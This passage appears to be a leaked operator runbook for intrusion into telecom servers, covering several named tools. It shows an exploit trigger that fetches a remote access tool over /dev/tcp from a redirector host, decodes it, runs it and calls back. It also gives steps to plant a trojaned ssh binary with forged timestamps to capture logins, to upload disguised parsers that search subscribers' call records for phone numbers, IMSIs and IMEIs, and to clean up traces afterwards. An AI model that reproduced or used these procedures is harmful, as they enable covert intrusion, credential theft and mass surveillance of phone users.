TARG_IP TARG_PORT SPECIAL_SOURCE_PORT ### Window 3: If need nopen to call back, set this up -nrtun NOPEN_PORT ### Window 4: use packrat to prep Nopen ### Change the Nopen to upload if necessary cd /current/up packrat -z RAT_REMOTE_NAME morerats/noserver-3.0.3.1-i586-pc-linux-gnu NETCAT_PORT ### Window 1: Trigger pork ### Many ways this command may need to be adjusted to do callback, execute rat, ### etc., so all possibilities not outlined below cd /current/bin # If TCP ./client -t TIME_ADJ SPECIAL_SOURCE_PORT 127.0.0.1 TARG_PORT "cd /tmp; mkdir TEMP_DIR; cd TEMP_DIR; cat < /dev/tcp/REDIR_IP/REDIR_PORT > RAT_REMOTE_NAME.uu; uudecode RAT_REMOTE_NAME.uu; chmod 700 RAT_REMOTE_NAME; PATH=. S=1 D=-cREDIR_IP:NOPEN_PORT RAT_REMOTE_NAME" # If UDP ./client -u TIME_ADJ SPECIAL_SOURCE_PORT 127.0.0.1 TARG_PORT "cd /tmp; mkdir TEMP_DIR; cd TEMP_DIR; cat < /dev/tcp/REDIR_IP/REDIR_PORT > RAT_REMOTE_NAME.uu; uudecode RAT_REMOTE_NAME.uu; chmod 700 RAT_REMOTE_NAME; PATH=. S=1 D=-cREDIR_IP:NOPEN_PORT RAT_REMOTE_NAME" ### Window 3: Should see Nopen connection if set up to callback ### If set up to listen, use this line -nstun TARG_IP NOPEN_PORT ### Should be able to handle it from here... ### ### END File user.tool.pork.COMMON ### (see also ../etc/user.tool.pork.COMMON) ### ### BEGIN File user.tool.cursehydrant.COMMON (see also ../etc/user.tool.cursehydrant.COMMON) ### ################ CURSEHYDRANT ######################### ############### PARSING ################################################################### ### vi Search/Replace commands ### ### ProjectName - self explanatory ### Date field - today's date, used for output files ### Host - hostname of the box (not IP address) ### Cryptkey - encryption key (use output from below md5sum command) md5sum /current/down/tcpdump.raw mx :%s/PROJECTNAME/PROJECTNAME/g :%s/DDMonYY/DDMonYY/g :%s/HOST/HOST/g :%s/CRYPTKEY/CRYPTKEY/g 'x ### Save the encryption key locally: echo CRYPTKEY > /current/down/cryptkey.cursehydrant.DDMonYY ####### Prepare files containing numbers to search for: # if files containing the numbers to search available: mkdir /current/down/argfiles cd /current/down/argfiles mz cp /mnt/zip*/arg* /current/down/argfiles #or cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles ls -altr ### Prep the argfiles: ### make sure the files are ASCII and contain NO EMPTY LINES!! ### make sure the last line does not contain a null character at the end ### (vi the file, add a carriage return to the last line, then delete the empty ### line and save) ### "file" results: ### This will not work: ASCII text, with CRLF line terminators ### This WILL: ASCII text cat arg* file arg* dos2unix arg* file arg* # if no data media is provided: # locally, create a file of numbers to grep for with each number on a separate line # make sure there are NO EMPTY LINES!!!! # Format of each type of argument: # p123456789 - phone number # s123456789 - IMSI # e123456789 - IMEI # c123/456 - Cell/LAC (no leading 0's) cd /current/down/argfiles vi /current/down/argfiles/argfile1.txt ########## To look at CDR directories try the following: ### Use the following commands to determine the location of current ### CDR data storage; Once you identify the location of the data, you'll ### use the head/tail commands to determine the date ranges being saved. ### These date ranges will be used as args in the cursehydrant commands. ### Typical file locations per host: ### Just check to see if files been removed -lt /root -vget /root/.sh_history ########################## liquidsteel: ### fc: 192.168.100.10 ls /share/a1338/ne_q3ic/nb/convert/output | wc -l ls /share/a1338/ne_q3ic/nb/convert/output | head -10 ls /share/a1338/ne_q3ic/nb/convert/output | tail -10 -ls /share/a1338/ne_q3ic/nb/convert/output/*dF* ########################## sicklestar: ### about two weeks worth are kept in this directory: ### CDRCOL1: 10.211.4.1 ### CDRCOL2: (if not on CDRCOL1) 10.211.4.2 ls /share/a1338/ne_q3ic/nb/convert/output | wc -l ls /share/a1338/ne_q3ic/nb/convert/output | head -10 ls /share/a1338/ne_q3ic/nb/convert/output | tail -10 -ls /share/a1338/ne_q3ic/nb/convert/output/*dF* ### this is where they are backed up - this could be huge ls /share/a1338/ne_q3ic/nb/convert/backup | head -10 ls /share/a1338/ne_q3ic/nb/convert/backup | tail -10 ls /share/a1338/ne_q3ic/nb/convert/backup/TODO | head -10 ls /share/a1338/ne_q3ic/nb/convert/backup/TODO | tail -10 ls /share/a1338/ne_q3ic/nb/convert/backup/ahmad | head -10 ls /share/a1338/ne_q3ic/nb/convert/backup/ahmad1 | head -10 ls /share/a1338/ne_q3ic/nb/convert/backup/ahmad/sulaman | wc -l ########################## CURSEHYDRANT ###################################################### ############################################################################################### ### Now, encrypt the ascii list...first make sure you have the encryption tool: which cryptTool.v1.0.Linux2.4.18-14.targetdl ### If cryptTool not in PATH, change your PATH or insert full path in command ### to encrypt one at a time...skip to next comment to encrypt all at once: cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTKEY -b cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTKEY -b file argfile*.enc ### to encrypt all at the same time: for i in argfile* ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i .txt`.enc -k CRYPTKEY -b ; done ls -l file argfile*.enc ### Tips for running the CURSEHYDRANT 4.2.1 ### DO NOT _APPEND_ to the local file if using encryption - (no >>L: or >>T: )!!!! ### per each argfile, create .enc1, .enc1.more, .enc1.more2, etc if additional ### passes are needed for the date range ### DO NOT use -o if also using >L: or >T: (mixed output corrupts the decryption) ### By default, the new CH expects a cryptokey: ### to run in the clear, take out the -k KEY, add -w, replace -P with -p ### The phone list is deleted automatically now ### Suggested -z options: ### this looks in subdirs, so use caution in backup dir (can be good AND bad): ### Also circumvents "parameter list too long" problem with wildcards with 'ls' -z "find /share/a1338/ne_q3ic/nb/convert/output -name '0506132*dF*' -print" ### works, but only for smaller ranges (command line arglist gets long) -z "ls -1rt /share/a1338/ne_q3ic/nb/convert/output/05110[3-6]*dF*" ##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (i.e. argfile1.enc) ##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more2, etc.) ##### NOTE2: GO FROM MOST RECENT TIME TO (PROBABLY CURRENT DATE) AS FAR BACK AS TIME ALLOWS ######## Upload the parser (CURSEHYDRANT) and called it lvmkd # put up the parser tool -put /current/up/cursehydrant.v4.2.1.HP-UXB.11.00.targetsl lvmkd # or -put /mnt/zip/cursehydrant.v4.2.1.HP-UXB.11.00.targetsl lvmkd ##### Upload the encrypted phone list as nfskd, then run the parser: ############ argfile 1 -put /current/down/argfiles/argfile1.enc nfskd export ENV_ARGS='-d -k CRYPTKEY -z "find /share/a1338/ne_q3ic/nb/convert/output -name '06071[3456]*dF*' -print" -P ./nfskd'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.enc1 -beep 15 ### Run again if needed for same tasking -put /current/down/argfiles/argfile1.enc nfskd export ENV_ARGS='-d -k CRYPTKEY -z "find /share/a1338/ne_q3ic/nb/convert/output -name '06071[012]*dF*' -print" -P ./nfskd'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.enc1.more -beep 15 ############ argfile 2 -put /current/down/argfiles/argfile2.enc nfskd export ENV_ARGS='-d -k CRYPTKEY -z "find /share/a1338/ne_q3ic/nb/convert/output -name '06070[89]*dF*' -print" -P ./nfskd'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.enc2 -beep 15 ### Run again if needed for same tasking -put /current/down/argfiles/argfile2.enc nfskd export ENV_ARGS='-d -k CRYPTKEY -z "find /share/a1338/ne_q3ic/nb/convert/output -name '06070[67]*dF*' -print" -P ./nfskd'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.enc2.more -beep 15 ############ argfile 3 -put /current/down/argfiles/argfile3.enc nfskd export ENV_ARGS='-d -k CRYPTKEY -z "find /share/a1338/ne_q3ic/nb/convert/output -name '06070[345]*dF*' -print" -P ./nfskd'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.enc3 -beep 15 ### Run again if needed for same tasking -put /current/down/argfiles/argfile3.enc nfskd export ENV_ARGS='-d -k CRYPTKEY -z "find /share/a1338/ne_q3ic/nb/convert/output -name '06070[012]*dF*' -print" -P ./nfskd'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.enc3.more #-beep 15 ###### ###### to run parser in the clear (unencrypted): ###### #-put /current/down/argfiles/argfile1.txt nfskd #export ENV_ARGS='-w -z "find /share/a1338/ne_q3ic/nb/convert/output -name '060501*dF*' -print" -p ./nfskd'; ./lvmkd >T:/current/down/cdrhits.test #-beep 15 ###### ###### to completely parse a range of files (no encryption & no particular number to search): ###### #export ENV_ARGS='-o -w -d -z "ls -1rt /share/a1338/ne_q3ic/nb/convert/output/06051[1-2]*dF*"; ./lvmkd >T:/current/down/cdr.morenumbers ###### ###### survey mode: ###### ### checks for IMEIs that have more than one IMSI associated with it: ### to limit amount of memory used, replace "-x" with "-X numberBytes" export ENV_ARGS='-x -k CRYPTKEY -z "ls -1rt /share/a1338/ne_q3ic/nb/convert/output/06051[1-2]*dF*"'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.enc.surveyIMEI ### generates a list of Cell IDs associated with each MSC address: ### to limit amount of memory used, replace "-y" with "-Y numberBytes" export ENV_ARGS='-y -k CRYPTKEY -z "ls -1rt /share/a1338/ne_q3ic/nb/convert/output/06051[1-2]*dF*"'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.enc.surveyMSC ###### ##### when it's done running, decrypt the file (-d -c options) ###### cd /current/down ls -latr cdr*enc* # to decrypt individually: cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehydrant.HOST.DDMonYY.enc1 -o cdrhits.cursehydrant.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehydrant.HOST.DDMonYY.enc2 -o cdrhits.cursehydrant.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c # or decrypt all at one time (once all are written fully) cd /current/down for i in cdrhits*enc* ; do n="`echo $i | sed \"s,enc,txt,g\"`" ; cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o $n -k CRYPTKEY -d -c ; done ls -latr cdr*txt* ###### ###### If you need to stop the parser before it completes: ### Control-C the nopen window containing the parser command ### ps -ef |grep lvmkd ### if the parser command is still "running", then kill the process: ### kill -9 ### You'll still be able to decrypt the partially completed data pull ###### ###### copy DECRYPTED data to media ###### ls -l cdr*txt* mz cp cdr*txt* /mnt/zip*/PROJECTNAME ls -l /mnt/zip*/PROJECTNAME uz ##### ##### clean up ##### ####### HP-UX (DO NOT BURN! DO NOT BURN! DO NOT BURN!) -gs wearcup ####### Everything else... -rm lvmkd nfskd -lt -cd /tmp -rm .scsi -lt w ps -ef | sort -lt / ##### Either -burn off or if the target is HPUX, use -exit and let -wearcup do the cleanup ### ### END File user.tool.cursehydrant.COMMON ### (see also ../etc/user.tool.cursehydrant.COMMON) ### ### BEGIN File user.tool.dubmoat.COMMON (see also ../etc/user.tool.dubmoat.COMMON) ### ########################################## # DUBMOAT ########################################## ### Verify version on target: uname -a which ssh ssh -V ### Preserve timestamps: -ls -i /usr/bin/ssh -ls -d /usr/bin touch -r /usr/bin/ssh /tmp/.st touch -r /usr/bin /tmp/.sb -lt ### Create location (utmp~) for dubmoat logging: -ls -t /var/run cp /var/run/utmp /var/run/utmp~ ### fix permisssions so any user can write to the file: chmod 666 /var/run/utmp~ ### Download original ssh: -get /usr/bin/ssh ### Upload dubmoat and check the version: -put /current/up/Ssh ssh ./ssh -V ### Cat our version over original to preserve inode: cat /tmp/ssh > /usr/bin/ssh -ls -i /usr/bin/ssh /usr/bin/ssh -V file /usr/bin/ssh ### Fix timestamps: touch -r /var/run/utmp /var/run/utmp~ touch -r /var/run/utmp /var/run touch -r /tmp/.st /usr/bin/ssh touch -r /tmp/.sb /usr/bin -ls -i /usr/bin/ssh -ls -d /usr/bin/. ### Cleanup: -rm .st .sb ssh ############################ # DUBMOAT COLLECTION ############################ -ls /var/adm/utmp* -get -l /var/adm/utmp~ ### Locally, extract the data from the encrypted file: cd /current/down /current/bin/ExtractData ./utmp > dub.TARGETNAME ### Verify the contents and take note of the file size field near ### the beginning of the output. Use that size to truncate the file ### in the next step: cat dub.TARGETNAME ### Upload the tool used to truncate the dubmoat collection file -put /current/bin/TruncateFileRemote dmt chmod 700 dmt ### Using the first "FILE SIZE" field from the output above, ### truncate the most recent collection out of the file -lt /var/adm/utmp~ ./dmt /var/adm/utmp~ -lt /var/adm/utmp~ -rm dmt ### ### END File user.tool.dubmoat.COMMON ### (see also ../etc/user.tool.dubmoat.COMMON) ### ### BEGIN File user.tool.cursehappy.COMMON (see also ../etc/user.tool.cursehappy.COMMON) ### ################ CURSEHAPPY ######################### ############### PARSING ################################################################### ### vi Search/Replace commands ### ### ProjectName - self explanatory ### Date field - today's date, used for output files ### Rec type - record type correlates with ProjectName, valid values: eh, ls, ss, wb ### Host - hostname of the box (not IP address) ### Cryptkey - encryption key (use output from below md5sum command) md5sum /current/down/tcpdump.raw mx :%s/PROJECTNAME/PROJECTNAME/g :%s/DDMonYY/DDMonYY/g :%s/HOST/HOST/g :%s/CRYPTKEY/CRYPTKEY/g 'x ### Save the encryption key locally: echo CRYPTKEY > /current/down/cryptkey.cursehappy.DDMonYY ####### Prepare files containing numbers to search for: # if files containing the numbers to search available: mkdir /current/down/argfiles cd /current/down/argfiles mz cp /mnt/zip*/arg* /current/down/argfiles #or cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles ls -altr ### Prep the argfiles: ### make sure the files are ASCII and contain NO EMPTY LINES!! ### make sure the last line does not contain a null character at the end ### (vi the file, add a carriage return to the last line, then delete the empty ### line and save) ### "file" results: ### This will not work: ASCII text, with CRLF line terminators ### This WILL: ASCII text cat arg* file arg* dos2unix arg* file arg* # if no data media is provided: # locally, create a file of numbers to grep for with each number on a separate line # make sure there are NO EMPTY LINES!!!! # Format of each type of argument: # p123456789 - phone number # s123456789 - IMSI # e123456789 - IMEI # c123/456 - Cell/LAC (no leading 0's) cd /current/down/argfiles vi /current/down/argfiles/argfile1.txt ########## To look at CDR directories try the following: ### Use the following commands to determine the location of current ### CDR data storage; Once you identify the location of the data, you'll ### use the head/tail commands to determine the date ranges being saved. ### These date ranges will be used as args in the cursehappy commands. ### Typical file locations per host: ########################## wholeblue: # tpmw01 10.3.4.55 # tpmw02 10.3.4.56 ### verifies isb, khi, and lhr directories: ls -ld /tp/med/datastore/collect/siemens_msc_* ls -ld /tp/med/datastore/collect/siemens_msc_*/.tmp_ncr ls -ld /tp/med/archive/collect/siemens_msc_* ls -ld /tp/med/archive/collect/siemens_msc_*/.tmp_ncr ### shows oldest and newest files in directories: ls -latr /tp/med/datastore/collect/*isb*/*.MSC | head -10 ls -latr /tp/med/datastore/collect/*isb*/*.MSC | tail -10 ls -latr /tp/med/datastore/collect/*khi*/*.MSC | head -10 ls -latr /tp/med/datastore/collect/*khi*/*.MSC | tail -10 ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | head -10 ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | tail -10 ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | head -10 ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | tail -10 ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | head -10 ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | tail -10 ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | head -10 ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | tail -10 ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | head -10 ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | tail -10 ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | head -10 ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | tail -10 ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | head -10 ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | tail -10 ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | head -10 ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | tail -10 ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | head -10 ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | tail -10 ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | head -10 ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | tail -10 # isbapro1 10.5.7.51 # nothing new -lt /u01/product_evdp/evident/data_store/collect ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | head -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | tail -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | head -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | tail -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | head -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | tail -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | head -10 ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | tail -10 -lt /u03/archive/collect # newer stuff ls -latr /u03/archive/collect/siemens_msc_isb01 | head -10 ls -latr /u03/archive/collect/siemens_msc_isb01 | tail -10 ls -latr /u03/archive/collect/siemens_msc_isb01 | wc -l # old stuff: ls -latr /u03/archive/collect/siemens_msc_khi01 | head -10 ls -latr /u03/archive/collect/siemens_msc_khi01 | tail -10 ########################## editionhaze: ls -latr /u06/saba/CDR/out/MS* | head -10 ls -latr /u06/saba/CDR/out/MS* | tail -10 ls -latr /u06/saba/CDR/out/MS* | wc -l ########################## liquidsteel: ########################## sicklestar: ### magnum: CURSEHAPPY not working on all SS .usd files :-( ### Try these first, should be all of them in one spot ls -latr /usd_archive/mc_storage/*usd | head -10 ls -latr /usd_archive/mc_storage/*usd | tail -10 ### If none in previous ones... ls -latr /sys1/var/billing/out_coll/*usd | head -10 ls -latr /sys1/var/billing/out_coll/*usd | tail -10 ls -latr /sys1/var/alcatel/out_coll/*usd | head -10 ls -latr /sys1/var/alcatel/out_coll/*usd | tail -10 ls -latr /sys1/var/billing/msc_is2 | tail -20 ########################## CURSEHAPPY ######################################################## ############################################################################################### ### Now, encrypt the ascii list...first make sure you have the encryption tool: which cryptTool.v1.0.Linux2.4.18-14.targetdl ### If cryptTool not in PATH, change your PATH or insert full path in command ### to encrypt one at a time...skip to next comment to encrypt all at once: cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTKEY -b cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTKEY -b file argfile*.enc ### to encrypt all at the same time: for i in argfile* ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i .txt`.enc -k CRYPTKEY -b ; done ls -l file argfile*.enc ### encrypt the def files for i in /current/up/cursedefs/*.def ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o /current/up/cursedefs/`basename $i .def`.enc -k CRYPTKEY -b ; done ls -l file /current/up/cursedefs/*.enc ### encrypt the def files ### Tips for running the CURSEHAPPY 4.0 ### DO NOT _APPEND_ to the local file if using encryption - (no >>L: or >>T: )!!!! ### per each argfile, create .enc1, .enc1.more, .enc1.more2, etc if additional ### passes are needed for the date range ### DO NOT use -loglevel if also using >L: or >T: (mixed output corrupts the decryption) ### The phone list is NOT deleted automatically in v3.2 ### remove it between each run as a practice ### Useful options: -n name of text file containing phone numbers -files list of files to parse (can contain wildcards) optional - same as no option -d output optional fields -all all record output (no search performed) -loglevel [#] level of info emitted via stderr:0,1,2,3 -def definition file (required) -lb leave behind mode Upload the parser (CURSEHAPPY) and called it crond # put up the parser tool mkdir /tmp/.scsi -cd /tmp/.scsi -put /current/up/cursehappy4 crond ##### Upload the encrypted phone list as adm, modify each parser command to have the ##### correct directory and date range of files to parse, then run the parser: ##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (i.e. argfile1.enc) ##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more2, etc.) ##### NOTE2: GO FROM MOST RECENT TIME TO (PROBABLY CURRENT DATE) AS FAR BACK AS TIME ALLOWS ############ argfile 1 -put /current/up/cursedefs/PROJECTNAME.enc adm~ -put /current/down/argfiles/argfile1.enc adm KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -d /CHANGEME/CDRFILES.2006071[3456]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc1 -beep 15 ### Run again if needed for same tasking -put /current/down/argfiles/argfile1.enc adm -put /current/up/cursedefs/PROJECTNAME.enc adm~ KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -d /CHANGEME/CDRFILES.2006071[012]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc1.more -beep 15 ############ argfile 2 -put /current/up/cursedefs/PROJECTNAME.enc adm~ -put /current/down/argfiles/argfile2.enc adm KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -d /CHANGEME/CDRFILES.2006071[3456]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc2 -beep 15 ### Run again if needed for same tasking -put /current/up/cursedefs/PROJECTNAME.enc adm~ -put /current/down/argfiles/argfile2.enc adm KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -d /CHANGEME/CDRFILES.2006071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc2.more -beep 15 ############ argfile 3 -put /current/up/cursedefs/PROJECTNAME.enc adm~ -put /current/down/argfiles/argfile3.enc adm KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -d /CHANGEME/CDRFILES.2006071[3456]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc3 -beep 15 ### Run again if needed for same tasking -put /current/down/argfiles/argfile3.enc adm -put /current/up/cursedefs/PROJECTNAME.enc adm~ KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -d /CHANGEME/CDRFILES.2006071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc3.more -beep 15 ############# ############# for loglevel testing (local file should be ascii?) ############# -put /current/up/cursedefs/PROJECTNAME.enc adm~ -put /current/down/argfiles/argfile1.enc adm KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -w e -loglevel 2 -d /CHANGEME/CDRFILES.2006071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.test -beep 15 ###### ##### when it's done running, decrypt the file (-d -c options) ###### cd /current/down ls -latr cdr*enc* # to decrypt individually: cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehappy.HOST.DDMonYY.enc1 -o cdrhits.cursehappy.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehappy.HOST.DDMonYY.enc2 -o cdrhits.cursehappy.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c # or decrypt all at one time (once all are written fully) cd /current/down for i in cdrhits*enc* ; do n="`echo $i | sed \"s,enc,txt,g\"`" ; cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o $n -k CRYPTKEY -d -c ; done ls -latr cdr*txt* ###### ###### If you need to stop the parser before it completes: ### Control-C the nopen window containing the parser command ### ps -ef |grep crond ### if the parser command is still "running", then kill the process: ### kill -9 ### You'll still be able to decrypt the partially completed data pull ###### ###### copy DECRYPTED data to media ###### ls -l cdr*txt* mz cp cdr*txt* /mnt/zip*/PROJECTNAME ls -l /mnt/zip*/PROJECTNAME uz ##### ##### clean up ##### -rm crond adm adm~ -lt -cd /tmp -rm .scsi -lt w ps -ef | sort -lt / -burnBURN ### ### END File user.tool.cursehappy.COMMON ### (see also ../etc/user.tool.cursehappy.COMMON) ### ### BEGIN File user.tool.orleansstride.COMMON (see also ../etc/user.tool.orleansstride.COMMON) ### ################ ORLEANSSTRIDE ######################### ############### PARSING ################################################################### ### vi Search/Replace commands ### ### ProjectName - self explanatory ### Date field - today's date, used for output files ### Host - hostname of the box (not IP address) ### Cryptkey - encryption key (use output from below md5sum command) md5sum /current/down/tcpdump.raw mx :%s/PROJECTNAME/PROJECTNAME/g :%s/DDMonYY/DDMonYY/g :%s/HOST/HOST/g :%s/CRYPTKEY/CRYPTKEY/g 'x ### Save the encryption key locally: echo CRYPTKEY > /current/down/cryptkey.orleansstride.DDMonYY ####### Prepare files containing numbers to search for: # if files containing the numbers to search available: mkdir /current/down/argfiles cd /current/down/argfiles mz cp /mnt/zip*/arg* /current/down/argfiles #or cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles ls -altr ### Prep the argfiles: ### make sure the files are ASCII and contain NO EMPTY LINES!! ### make sure the last line does not contain a null character at the end ### (vi the file, add a carriage return to the last line, then delete the empty ### line and save) ### "file" results: ### This will not work: ASCII text, with CRLF line terminators ### This WILL: ASCII text cat arg* file arg* dos2unix arg* file arg* # if no data media is provided: # locally, create a file of numbers to grep for with each number on a separate line # make sure there are NO EMPTY LINES!!!! # if searching for LACs and cell id's, use the format in the documentation: # ex. - 410 01 95 18374 # if searching for phone numbers, use the normal format: # ex. - 4837506 cd /current/down/argfiles vi /current/down/argfiles/argfile1.txt ### For ORLEANSSTRIDE, the numbers must be in sorted order...the following loop ### will put all of the files in sorted order cd /current/down/argfiles for i in argfile*.txt; do sort -u -o `basename $i .txt`.sorted; done ### Make sure find the cryptTool...add to PATH if which fails... which cryptTool.v1.0.Linux2.4.18-14.targetdl ### To encrypt one at a time... cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.sorted -o argfile1.enc -k CRYPTKEY -b cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.sorted -o argfile2.enc -k CRYPTKEY -b file argfile*.enc ### Loop to encrypt all the argfiles cd /current/down/argfiles for i in argfile*.sorted; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i .sorted`.enc -k CRYPTKEY -b file argfile*.enc ########## To look at CDR directories try the following: ### Use the following commands to determine the location of current ### CDR data storage; Once you identify the location of the data, you'll ### use the head/tail commands to determine the date ranges being saved. ### These date ranges will be used as args in the orleansstride commands. ### Typical file locations per host: ########################## sicklestar: # magnum 10.140.0.68 ls -lart /archive/cdrc/*mob | head -10 ls -lart /archive/cdrc/*mob | tail -10 ls -lart /archive/cdrc/input/DONE/*mob | head -10 ls -lart /archive/cdrc/input/DONE/*mob | tail -10 ### Tips for running the ORLEANSSTRIDE 1.0 ### DO NOT _APPEND_ to the local file if using encryption - (no >>L: or >>T: )!!!! ### per each argfile, create .enc1, .enc1.more, .enc1.more2, etc if additional ### passes are needed for the date range ### The phone list is deleted automatically ######## Upload the parser (ORLEANSSTRIDE) and call it nscd # put up the parser tool mkdir /tmp/.scsi -cd /tmp/.scsi -put /current/up/orleansstride.v1.0.SunOS5.8.targetsl nscd ##### Upload the encrypted phone list as awk, modify each parser command to have the ##### correct directory and date range of files to parse, then run the parser: ##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (i.e. argfile1.enc) ##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more2, etc.) ##### NOTE2: GO FROM MOST RECENT TIME TO (PROBABLY CURRENT DATE) AS FAR BACK AS TIME ALLOWS ############ argfile 1 -put /current/down/argfiles/argfile1.enc awk -setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[789]*.mob' -print" -P ./awk ./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc1 -beep 15 ### Run again if needed for same tasking -put /current/down/argfiles/argfile1.enc awk -setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -P ./awk ./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc1.more -beep 15 ############ argfile 2 -put /current/down/argfiles/argfile2.enc awk -setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[789]*.mob' -print" -P ./awk ./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc2 -beep 15 ### Run again if needed for same tasking -put /current/down/argfiles/argfile2.enc awk -setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -P ./awk ./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc2.more -beep 15 ############ argfile 3 -put /current/down/argfiles/argfile3.enc awk -setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[789]*.mob' -print" -P ./awk ./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc3 -beep 15 ### Run again if needed for same tasking -put /current/down/argfiles/argfile3.enc awk -setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -P ./awk ./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc3.more -beep 15 ###### ###### survey mode: ###### ### checks for IMEIs that have more than one IMSI associated with it: ### to limit amount of memory used, replace "-x" with "-X numberBytes" -setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -x ./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc.surveyIMEI 